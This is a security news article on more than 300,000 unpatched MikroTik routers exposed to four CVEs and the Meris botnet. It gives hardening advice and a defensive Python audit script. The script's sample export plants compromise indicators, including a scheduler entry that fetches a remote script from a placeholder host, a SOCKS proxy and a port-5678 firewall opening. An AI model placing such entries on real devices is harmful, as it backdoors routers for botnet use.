300,000 MikroTik Devices Still Vulnerable To Botnets For Remote Hacking

Security researchers at Eclypsium have recently identified more than 300,000 Internet-accessible MikroTik routers that remain vulnerable. Threat actors are targeting these routers because their owners never installed the firmware updates for vulnerabilities that are up to four years old.

The investigation found that the most affected devices are located in the following countries:-

  • China
  • Brazil
  • Russia
  • Italy
  • Indonesia
  • The U.S.

Rugged router swarm up for grabs

All of the affected MikroTik devices are vulnerable to the four CVEs listed below:-

  • CVE-2019-3977: Remote OS downgrade and system reset. CVSS v3 – 7.5
  • CVE-2019-3978: Remote unauthenticated cache poisoning. CVSS v3 – 7.5
  • CVE-2018-14847: Remote unauthenticated arbitrary file access and write. CVSS v3 – 9.1
  • CVE-2018-7445: Buffer overflow enabling remote access and code execution. CVSS v3 – 9.8

Known Threats and Capabilities

Threat actors have been actively targeting MikroTik routers, and soon afterwards a new record-breaking DDoS attack was observed. Initial reports point to the Meris botnet.

The Meris botnet is known to run on MikroTik routers, and the capabilities demonstrated in these attacks are highly dangerous.

The experts note that compromised routers can inject malicious content and tunnel, copy, or reroute traffic, which can then be used in a variety of damaging ways.

Harden MikroTik Devices

MikroTik has published instructions that help to harden MikroTik devices; we list them below:-

  • Remember to keep your MikroTik device updated.
  • Don’t open access to your device from the internet to everyone; only expose a secured VPN service, such as IPsec.
  • Always use a strong password, and change it regularly.
  • Do not trust your local networks.
  • Keep checking the RouterOS configuration for unknown settings:
    • System -> Scheduler rules that execute a Fetch script. Remove these.
    • IP -> Socks proxy. If you don’t use this feature or don’t know what it does, disable it.
    • An L2TP client named “VPN”, or any L2TP client that you don’t recognize.
    • An input firewall rule that allows access to port 5678.
    • Always block the domains and tunnel endpoints associated with the Meris botnet.
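The four configuration checks in the list above can be run offline against a saved RouterOS `/export` without logging into the device interactively. The script below is an added example written for this article; it is not Eclypsium's inspection tool and not MikroTik code. It assumes the common export layout (a section line such as `/ip socks` followed by `add`/`set` lines of `key=value` tokens, with trailing backslashes as line continuations), and it assumes a filter rule with no explicit `action` behaves as `accept`. The sample export, its addresses and its URL are constructed placeholders.

```python
import shlex
from typing import Dict, List, Tuple

# Constructed sample: an abbreviated RouterOS "/export" containing each of the
# four indicators from the checklist. Addresses use documentation ranges and
# the URL uses the reserved .invalid TLD; none of it is real infrastructure.
SAMPLE_EXPORT = """\
/system scheduler
add interval=1m name=schedule1 on-event="/tool fetch url=http://placeholder.invalid/x.rsc \\
    mode=http dst-path=x.rsc" policy=ftp,reboot,read,write,policy,test
add interval=1d name=backup on-event="/system backup save name=daily" policy=read
/ip socks
set enabled=yes port=1080
/interface l2tp-client
add connect-to=203.0.113.10 disabled=no name=VPN user=lvpn
add connect-to=198.51.100.5 disabled=no name=office-l2tp user=jdoe
/ip firewall filter
add action=accept chain=input dst-port=5678 protocol=tcp comment="added"
add action=accept chain=input connection-state=established,related
add action=drop chain=input in-interface-list=WAN
"""


def _logical_lines(text: str) -> List[str]:
    """Join RouterOS line continuations (a trailing backslash) into single lines."""
    out, buf = [], ""
    for raw in text.splitlines():
        piece = raw.strip()
        if piece.endswith("\\"):
            buf += piece[:-1].rstrip() + " "
            continue
        out.append((buf + piece).strip())
        buf = ""
    if buf:
        out.append(buf.strip())
    return out


def parse_export(text: str) -> List[Tuple[str, Dict[str, str]]]:
    """Parse an export into (section, {key: value}) entries, e.g. ("/ip socks", {...})."""
    entries, section = [], ""
    for line in _logical_lines(text):
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):          # "/system scheduler", "/ip firewall filter", ...
            section = line
            continue
        tokens = shlex.split(line)         # respects quotes around on-event="..." values
        if not tokens:
            continue
        entry = {"_cmd": tokens[0]}        # "add" or "set"
        for tok in tokens[1:]:
            key, _, value = tok.partition("=")
            entry[key] = value
        entries.append((section, entry))
    return entries


def _port_matches(spec: str, port: int) -> bool:
    """True if a dst-port list such as "5678", "80,5678" or "5000-6000" covers port."""
    for item in spec.split(","):
        lo, _, hi = item.strip().partition("-")
        if not lo.isdigit() or (hi and not hi.isdigit()):
            continue
        if (int(lo) <= port <= int(hi)) if hi else (int(lo) == port):
            return True
    return False


def audit(entries: List[Tuple[str, Dict[str, str]]]) -> List[Dict[str, str]]:
    """Apply the four checklist items and return one finding dict per hit."""
    findings = []
    for section, e in entries:
        if section == "/system scheduler" and "fetch" in e.get("on-event", "").lower():
            findings.append({"check": "scheduler-fetch", "where": e.get("name", "?"),
                             "detail": e["on-event"]})
        elif section == "/ip socks" and e.get("enabled") == "yes":
            findings.append({"check": "socks-enabled", "where": "port " + e.get("port", "1080"),
                             "detail": "disable unless deliberately used"})
        elif section == "/interface l2tp-client":
            name = e.get("name", "")
            check = "l2tp-client-vpn" if name == "VPN" else "l2tp-client-review"
            findings.append({"check": check, "where": name,
                             "detail": "connect-to=" + e.get("connect-to", "?")})
        elif section == "/ip firewall filter" and e.get("chain") == "input":
            # Assumption: a filter rule without an explicit action accepts traffic.
            if e.get("action", "accept") == "accept" and _port_matches(e.get("dst-port", ""), 5678):
                findings.append({"check": "input-allow-5678", "where": e.get("comment", "(no comment)"),
                                 "detail": "protocol=" + e.get("protocol", "?")})
    return findings


def audit_export(text: str) -> List[Dict[str, str]]:
    return audit(parse_export(text))


if __name__ == "__main__":
    for f in audit_export(SAMPLE_EXPORT):
        print(f"[{f['check']}] {f['where']}: {f['detail']}")
```

Every unrecognised L2TP client is reported for review rather than only the one literally named “VPN”, since the checklist asks for both; a port range or comma-separated port list that covers 5678 is treated the same as an exact `dst-port=5678`.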

To help users follow these guidelines, Eclypsium's security analysts have published a free MikroTik inspection tool that checks whether a device is vulnerable to CVE-2018-14847 and whether it shows any indication of the Mēris botnet.

Attacks of this kind are dangerous and have wide-ranging impact, which is why organizations need the ability to identify and assess this attack surface both in the enterprise and in employees’ remote work environments.


BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.